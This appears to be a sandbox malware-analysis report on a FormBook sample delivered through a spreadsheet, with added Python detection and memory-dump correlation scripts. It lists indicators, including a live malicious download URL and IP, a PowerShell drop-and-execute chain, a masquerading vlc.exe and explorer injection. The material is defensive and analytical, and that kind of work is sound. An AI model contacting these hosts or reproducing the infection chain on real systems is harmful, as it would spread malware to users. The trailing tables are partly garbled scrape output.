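# and the system-binary paths are assumptions; "pid" values are the graph's node
# numbers, not the sandbox PIDs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\Public\oftmhayq.exe"
FAKE_VLC = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe"
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 9, "image": PS},
    {"type": "network_connect", "pid": 9, "image": PS, "dest_host": "sparepartiran.com",
     "dest_ip": "162.223.88.131", "dest_port": 80,
     "url": "http://sparepartiran.com/js/2Q/5901777.pdf.exe"},
    {"type": "file_create", "pid": 9, "image": PS, "target": DROPPER},
    {"type": "process_create", "pid": 18, "ppid": 9, "image": DROPPER},
    {"type": "file_create", "pid": 23, "image": DROPPER, "target": FAKE_VLC},
    {"type": "process_create", "pid": 33, "ppid": 23, "image": DROPPER},
    {"type": "remote_thread", "pid": 33, "image": DROPPER, "target_image": r"C:\Windows\explorer.exe"},
    {"type": "process_create", "pid": 37, "ppid": 35, "image": FAKE_VLC},
    # Control event: the real player launched from its install directory must not fire.
    {"type": "process_create", "pid": 99, "ppid": 35, "image": r"C:\Program Files\VideoLAN\VLC\vlc.exe"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PE_EXT = re.compile(r"\.(exe|dll|scr|com)$", re.I)
# C:\Users\Public is world-writable; Start Menu\Programs should only hold .lnk shortcuts.
SUSPICIOUS_DIRS = re.compile(r"^c:\\users\\public\\|\\start menu\\programs\\", re.I)
USER_WRITABLE = re.compile(r"^c:\\users\\", re.I)
# Document-looking name with an executable extension, as in 5901777.pdf.exe.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(exe|scr|com)$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def run_detections(events):
    """Return (rule, detail) pairs for every event that matches one of the rules."""
    hits = []
    for ev in events:
        kind = ev["type"]
        if kind == "file_create" and basename(ev["image"]) in SCRIPT_HOSTS and PE_EXT.search(ev["target"]):
            hits.append(("script_host_drops_pe", ev["target"]))
        if kind == "process_create" and SUSPICIOUS_DIRS.search(ev["image"]):
            hits.append(("exec_from_suspicious_dir", ev["image"]))
        if kind == "network_connect" and DOUBLE_EXT.search(ev.get("url", "")):
            hits.append(("double_extension_download", ev["url"]))
        if (kind == "remote_thread" and USER_WRITABLE.search(ev["image"])
                and basename(ev["target_image"]) == "explorer.exe"):
            hits.append(("user_dir_binary_injects_explorer", ev["image"]))
    return hits


def dropped_then_executed(events):
    """Correlate PE writes with later process creations of the same path.

    Returns (dropper image, executed path) pairs in event order."""
    dropped = {}
    chains = []
    for ev in events:
        if ev["type"] == "file_create" and PE_EXT.search(ev["target"]):
            dropped[ev["target"].lower()] = ev["image"]
        elif ev["type"] == "process_create" and ev["image"].lower() in dropped:
            chains.append((dropped[ev["image"].lower()], ev["image"]))
    return chains


if __name__ == "__main__":
    for rule, detail in run_detections(SAMPLE_EVENTS):
        print(f"{rule:36} {detail}")
    for dropper, child in dropped_then_executed(SAMPLE_EVENTS):
        print(f"drop-then-exec: {basename(dropper)} -> {child}")
```

The Start Menu\Programs check is the one worth keeping generic: that folder holds .lnk shortcuts, so a PE32 file there (the report's vlc.exe) is a masquerading indicator whatever the file is called, and the control event shows the real VLC install path does not trip it. Rules keyed on the name oftmhayq.exe or on the domain would only catch this campaign.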


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
5901777.xls | 24% | Virustotal | (none)

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\oftmhayq.exe | 100% | Avira | HEUR/AGEN.1136389
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe | 100% | Avira | HEUR/AGEN.1136389
C:\Users\Public\oftmhayq.exe | 100% | Joe Sandbox ML | (none)
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe | 100% | Joe Sandbox ML | (none)

Unpacked PE Files

Source | Detection | Scanner | Label
29.0.oftmhayq.exe.870000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
25.2.oftmhayq.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
30.2.oftmhayq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
29.2.oftmhayq.exe.870000.1.unpack | 100% | Avira | HEUR/AGEN.1136389
32.2.vlc.exe.70000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
30.0.oftmhayq.exe.8a0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
29.2.oftmhayq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
25.0.oftmhayq.exe.fa0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
24.0.oftmhayq.exe.7c0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
30.2.oftmhayq.exe.8a0000.1.unpack | 100% | Avira | HEUR/AGEN.1136389
24.2.oftmhayq.exe.7c0000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
32.0.vlc.exe.70000.0.unpack | 100% | Avira | HEUR/AGEN.1136389
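The Yara hits in the FormBook sections above are reported against memory-dump names such as 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, while the table above lists unpacked images by decimal PID and base address (30.2.oftmhayq.exe.400000.0.unpack). The first dump field is the PID in hex (0x1E = 30, 0x1D = 29, 0x20 = 32, the vlc.exe process), so the two lists can be joined. The script below is an added example, not part of the report: it parses both naming schemes (the dump names are copied from the Yara list, the unpack names from the table above) and reports which Yara hits land in a region that also appears as an unpacked PE. Reading the fifth dump field as the Win32 page-protection constant (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE) and the second field as the dump stage are assumptions about the sandbox's naming, not something the page states.

```python
import re
from dataclasses import dataclass

# Memory-dump names copied from the report's "Yara detected FormBook" list.
YARA_MEMORY_HITS = [
    "0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp",
    "0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp",
    "00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp",
    "00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp",
    "0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp",
    "0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp",
    "00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp",
]
# Unpacked-PE names copied from the "Unpacked PE Files" table.
UNPACKED = [
    "29.0.oftmhayq.exe.870000.0.unpack", "25.2.oftmhayq.exe.fa0000.0.unpack",
    "30.2.oftmhayq.exe.400000.0.unpack", "29.2.oftmhayq.exe.870000.1.unpack",
    "32.2.vlc.exe.70000.0.unpack", "30.0.oftmhayq.exe.8a0000.0.unpack",
    "29.2.oftmhayq.exe.400000.0.unpack", "25.0.oftmhayq.exe.fa0000.0.unpack",
    "24.0.oftmhayq.exe.7c0000.0.unpack", "30.2.oftmhayq.exe.8a0000.1.unpack",
    "24.2.oftmhayq.exe.7c0000.0.unpack", "32.0.vlc.exe.70000.0.unpack",
]

# Assumed layout of a dump name (the page does not document it):
# <pid hex>.<stage hex>.<dump id>.<base address hex>.<page protection hex>.<region type hex>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.I)
# <pid decimal>.<stage>.<image name>.<base address hex>.<index>.unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-F]+)\.(\d+)\.unpack$", re.I)

PAGE_EXECUTE_MASK = 0xF0  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY are 0x10..0x80


@dataclass(frozen=True)
class MemoryDump:
    name: str
    pid: int
    stage: int
    base: int
    protect: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & PAGE_EXECUTE_MASK)


@dataclass(frozen=True)
class UnpackedPE:
    name: str
    pid: int
    stage: int
    image: str
    base: int


def parse_sdmp(name: str) -> MemoryDump:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a dump name: {name}")
    pid, stage, _dump_id, base, protect, _kind = m.groups()
    return MemoryDump(name, int(pid, 16), int(stage, 16), int(base, 16), int(protect, 16))


def parse_unpack(name: str) -> UnpackedPE:
    m = UNPACK_RE.match(name)
    if not m:
        raise ValueError(f"not an unpack name: {name}")
    pid, stage, image, base, _index = m.groups()
    return UnpackedPE(name, int(pid), int(stage), image, int(base, 16))


def pids_by_image(unpack_names):
    """Map sandbox PID -> image name, recovered from the unpack table."""
    return {u.pid: u.image for u in map(parse_unpack, unpack_names)}


def correlate(dump_names, unpack_names):
    """For every Yara memory hit, list unpacked PEs from the same PID at the same base."""
    pes = [parse_unpack(n) for n in unpack_names]
    return {d.name: [p.name for p in pes if p.pid == d.pid and p.base == d.base]
            for d in map(parse_sdmp, dump_names)}


def describe(dump_names, unpack_names):
    images = pids_by_image(unpack_names)
    links = correlate(dump_names, unpack_names)
    return [f"pid {d.pid:>2} ({images.get(d.pid, 'unknown')}) base 0x{d.base:08X} "
            f"prot 0x{d.protect:02X} exec={d.executable} -> {links[d.name] or 'no unpacked PE'}"
            for d in map(parse_sdmp, dump_names)]


if __name__ == "__main__":
    print("\n".join(describe(YARA_MEMORY_HITS, UNPACKED)))
```

Running it shows that the two hits at base 0x400000 in PIDs 29 and 30 (both in executable regions) are exactly the regions the table lists as 29.2.oftmhayq.exe.400000.0.unpack and 30.2.oftmhayq.exe.400000.0.unpack, the rebuilt image Avira labels TR/Crypt.ZPACK.Gen, while the 0x04 hits in PIDs 24, 25 and 32 are data regions with no unpacked counterpart and are better treated as Yara matches on decrypted strings than as a second payload.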

Domains

Source | Detection | Scanner
sparepartiran.com | 11% | Virustotal

URLs

Apart from the sparepartiran.com entries (the download host and the stage URL), every URL in this table is either a font-vendor address carried in the name tables of the Windows fonts the process enumerated (fontbureau, carterandcone, sakkal, urwpp, typography.net, founder.com.cn and so on; trailing characters such as "netD" or "comat" are adjacent bytes picked up by the string scan) or a placeholder from PowerShell module manifests (contoso.com, pesterbdd.com, the truncated https://go.micro). None of those are indicators for this sample.

Source | Detection | Scanner | Verdict
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://sparepartiran.com/js/2Q/5 | 0% | Avira URL Cloud | safe
http://www.fonts.comat | 0% | Avira URL Cloud | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://sparepartiran.com | 11% | Virustotal | (none)
http://sparepartiran.com | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cnp | 0% | Avira URL Cloud | safe
http://www.sakkal.como | 0% | Avira URL Cloud | safe
http://www.ascendercorp.com/typedesigners.html: | 0% | Avira URL Cloud | safe
http://www.urwpp.deocS | 0% | Avira URL Cloud | safe
http://www.fontbureau.coma77 | 0% | Avira URL Cloud | safe
http://www.fontbureau.comldva | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://www.carterandcone.comR | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.founder.com.cn/cnn-u | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.sakkal.comc | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.urwpp.deX | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.carterandcone.comegu | 0% | Avira URL Cloud | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://en.wikip | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/I7s | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sparepartiran.com | 162.223.88.131 | true | true | (none) | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://sparepartiran.com/js/2Q/5901777.pdf.exe | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

One entry per URL: the URL, then the processes and memory dumps it was found in, whether the report marks it malicious, the antivirus verdict and the reputation.

http://www.fontbureau.com/designersG
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | reputation: high
http://www.fontbureau.com/designers/?
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | reputation: high
http://www.founder.com.cn/cn/bThe
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://sparepartiran.com/js/2Q/5
    sources: powershell.exe, 00000015.00000002.433516174.000001F6CD269000.00000004.00000001.sdmp | malicious: true | Avira URL Cloud: safe | reputation: unknown
http://www.fontbureau.com/designers?
    sources: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | reputation: high
http://www.fonts.comat
    sources: oftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://contoso.com/License
    sources: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.tiro.com
    sources: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.fontbureau.com/designers
    sources: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | reputation: high
http://www.fontbureau.com/designers/O
    sources: oftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmp | malicious: false | reputation: high
http://sparepartiran.com
    sources: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp; powershell.exe, 00000015.00000002.431327100.000001F6CD016000.00000004.00000001.sdmp | malicious: true | Virustotal: 11%; Avira URL Cloud: safe | reputation: unknown
http://www.goodfont.co.kr
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.carterandcone.com
    sources: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.sajatypeworks.com
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.typography.netD
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.founder.com.cn/cn/cThe
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.galapagosdesign.com/staff/dennis.htm
    sources: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://fontfabrik.com
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000018.00000003.421069642.0000000005A6D000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.founder.com.cn/cnp
    sources: oftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.sakkal.como
    sources: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.fontbureau.com/designersG6
    sources: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.ascendercorp.com/typedesigners.html:
    sources: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.urwpp.deocS
    sources: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.fontbureau.coma77
    sources: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.fontbureau.comldva
    sources: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
https://contoso.com/
    sources: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
https://nuget.org/nuget.exe
    sources: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp; powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.carterandcone.comR
    sources: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.galapagosdesign.com/DPlease
    sources: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.founder.com.cn/cnn-u
    sources: oftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.fonts.com
    sources: oftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp; oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | reputation: high
http://www.sandoll.co.kr
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.urwpp.deDPlease
    sources: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.sakkal.comc
    sources: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.zhongyicts.com.cn
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    sources: powershell.exe, 00000014.00000002.417757866.000001D20A471000.00000004.00000001.sdmp; powershell.exe, 00000015.00000002.425672375.000001F6CC491000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.sakkal.com
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.urwpp.deX
    sources: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.fontbureau.com/designers/frere-jones.htmlj
    sources: oftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmp | malicious: false | reputation: high
http://nuget.org/NuGet.exe
    sources: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp; powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: false | reputation: high
http://www.apache.org/licenses/LICENSE-2.0
    sources: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | reputation: high
http://www.fontbureau.com
    sources: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp; oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp; explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp | malicious: false | reputation: high
http://www.galapagosdesign.com/
    sources: oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://pesterbdd.com/images/Pester.png
    sources: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://www.carterandcone.comegu
    sources: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp | malicious: false | Avira URL Cloud: safe | reputation: unknown
http://www.apache.org/licenses/LICENSE-2.0.html
    sources: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: false | reputation: high
https://go.micro
    sources: powershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
https://contoso.com/Icon
    sources: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: false | URL Reputation: safe | reputation: unknown
http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO
    sources: powershell.exe, 00000014.00000002.421247257.000001D20A682000.00000004.00000001.sdmp; powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp | malicious: true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://en.wikipoftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.carterandcone.comloftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/I7softmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.founder.com.cn/cn/oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cnoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmloftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                            high
                                            http://sparepartiran.com/js/2Q/5901777.pdf.exeerspowershell.exe, 00000014.00000002.417383854.000001D20A3F4000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://sparepartiran.cpowershell.exe, 00000014.00000002.434703367.000001D20B78E000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.monotype.oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/Kurst7Doftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                                              high
                                              http://sparepartiran.comxpowershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/S7oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown

                                              Contacted IPs

                                              Public

IP               Domain    Country         ASN    ASN Name   Malicious
162.223.88.131   unknown   United States   19084  COLOUPUS   true

                                              General Information

